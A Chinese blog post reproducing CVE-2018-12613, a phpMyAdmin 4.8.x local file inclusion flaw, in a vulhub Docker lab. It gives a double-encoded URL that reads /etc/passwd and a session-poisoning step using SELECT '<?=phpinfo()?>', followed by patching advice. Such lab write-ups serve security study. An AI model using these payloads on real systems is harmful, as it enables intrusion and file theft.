目录

漏洞描述

漏洞复现

复现

解决方法

漏洞描述

PhpMyAdmin 是一个用 PHP 编写的免费软件工具,旨在通过 Web 处理 MySQL 的管理。该漏洞在index.php中,导致文件包含漏洞。

在phpMyadmin4.8.x版本中,程序没有严格控制用户的输入,攻击者可以利用双重编码绕过程序的白名单限制,造成 LFI(本地文件包含)漏洞。

受影响的系统版本为phpMyadmin4.8.0和phpMyadmin4.8.1。漏洞编号 CVE-2018-12613。

漏洞复现

使用docker搭建vulhub平台,

运行以下命令启动phpMyadmin4.8.1

docker-compose up -d

环境启动后,访问http://your-ip:8080. phpmyadmin 是“config”模式,所以我们可以直接登录。

复现

访问地址

http://ip:8080

显示结果:

访问地址

http://ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

结果表明存在文件包含漏洞:

我们可以执行SELECT '<?=phpinfo()?>';,

检查session id(cookie 中phpMyAdmin的值)

包含 session 文件:

解决方法

  1. 更新phpmyadmin版本。
  2. 删除index.php中使用文件包含的函数。
  3. 进行输入转码和过滤拦截敏感字符。
  4. 安装杀毒软件,开启防火墙拦截异常行为。

PhpMyAdmin文件包含漏洞相关推荐

  1. phpmyadminV4.8.1本地文件包含漏洞复现

    文章目录 一.phpMyadmin简介 二.什么是文件包含漏洞? 三.本地包含和远程包含 四.文件包含相关函数介绍 1.函数介绍 2.报错 3._once 4.小结 五.关于windows特性的一个小 ...

  2. 18.phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)

    phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) phpMyAdmin是一套开源的.基于Web的MySQL数据库管理工具.其index.php中存在一处文件包含逻辑, ...

  3. test.php.bak,记一次phpmyadmin 4.8.1 远程文件包含漏洞(BUUCTF web)

    题目很简单,一个滑稽 打开源码,发现存在source.php文件 于是访问文件,发现出现一串php源码 提示存在hint.php,于是访问发现一句话 flag not here, and flag i ...

  4. index.php.bak 颓废_18.phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)

    phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) phpMyAdmin是一套开源的.基于Web的MySQL数据库管理工具.其index.php中存在一处文件包含逻辑, ...

  5. delphi cxgrid读取本地image_技术讨论 | PHP本地文件包含漏洞GetShell

    序言 让我们突破重重苛刻环境GetShell,文中有以phpmyadmin包含漏洞做演示. PS:本文仅用于技术讨论与分析,严禁用于任何非法用途,违者后果自负. 漏洞背景 当您在发现PHP本地文件包含 ...

  6. mysql 多字节编码漏洞_phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)

    漏洞详情 范围 phpMyAdmin 4.8.0和4.8.1 原理 首先在index.php 50-63行代码 $target_blacklist = array ( 'import.php', 'e ...

  7. 远程文件包含 php,php本地及远程文件包含漏洞

    在php程序中包含有file inclusion的时候,php要开启一下两个功能: allow_url_fopen on allow_url_include on 但是开启这两个功能之后伴随的是url ...

  8. index.php.bak 颓废_CVE-2018-12613-phpmyadmin4.8.1远程文件包含漏洞复现

    CVE-2018-12613-phpmyadmin4.8.1远程文件包含漏洞复现 By:Mirror王宇阳 漏洞原理 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞.该漏洞来自一部分代码,其 ...

  9. 89.网络安全渗透测试—[常规漏洞挖掘与利用篇5]—[文件包含漏洞详解实战示例]

    我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一.文件包含漏洞详解 1.文件包含漏洞相关概念 2.PHP文件包含漏洞相关概念 3.PHP文件包含漏洞利用:`构 ...

最新文章

  1. Android中LayoutInflater的使用
  2. C# 开发WinCE 遇到Motorola PDA 的问题记录
  3. 数字图像处理实验(12):PROJECT 05-03,Periodic Noise Reduction Using a Notch Filter
  4. 【小练习06】HTML+CSS--电影公告
  5. 目前对Learning to Rank 最全面的总结
  6. Spring 中获取servletContext及WebApplicationContext以及applicationContext三者之间的关系
  7. iOS中AutoLayer自动布局流程及相关方法
  8. java 贪吃蛇 控制台_控制台游戏贪吃蛇Java版
  9. 03-21 webview 性能分析
  10. js map的get 和list比 那个快_js中let和var
  11. Church's Coupon Performance Test Script
  12. android小米推送,Android集成小米推送
  13. RM3100 stm32 hal库 spi 磁力计数据
  14. 评价模型总结——个人学习笔记(二)
  15. 青出于蓝而胜于蓝——揭秘全新的 HWSQL
  16. pip 按照requirements.txt安装到对应的package名称的文件中
  17. Mysql序号 查询
  18. ALK8266WIFI解决方案支持常见普通单片机实现WIFI高速传输和许多实用功能,实测速度超过M字节每秒
  19. SIMT和SIMD之总结篇
  20. Cannot enable Hyper-V service

热门文章

  1. 华为路由器实现不同VLAN路由---单臂路由
  2. easy-jenkins自动化部署
  3. 亲测!超纯净的软件管家
  4. Go是一门面向对象编程语言吗
  5. 【地球科学】DEM数据简要总结及ALOS PALSAR12.5m数据获取和对比显示
  6. unity 震动脚本_Unity实现苹果手机Taptic震动
  7. 0064-【测序行业】-2018基因检测行业研究报告丨鲸准研究院
  8. Eviews用向量自回归模型VAR实证分析公路交通通车里程与经济发展GDP协整关系时间序列数据和脉冲响应可视化
  9. Win10设置睡眠、休眠、关闭硬盘,适合程序长时间执行
  10. Aflow安装与测试以及遇到的问题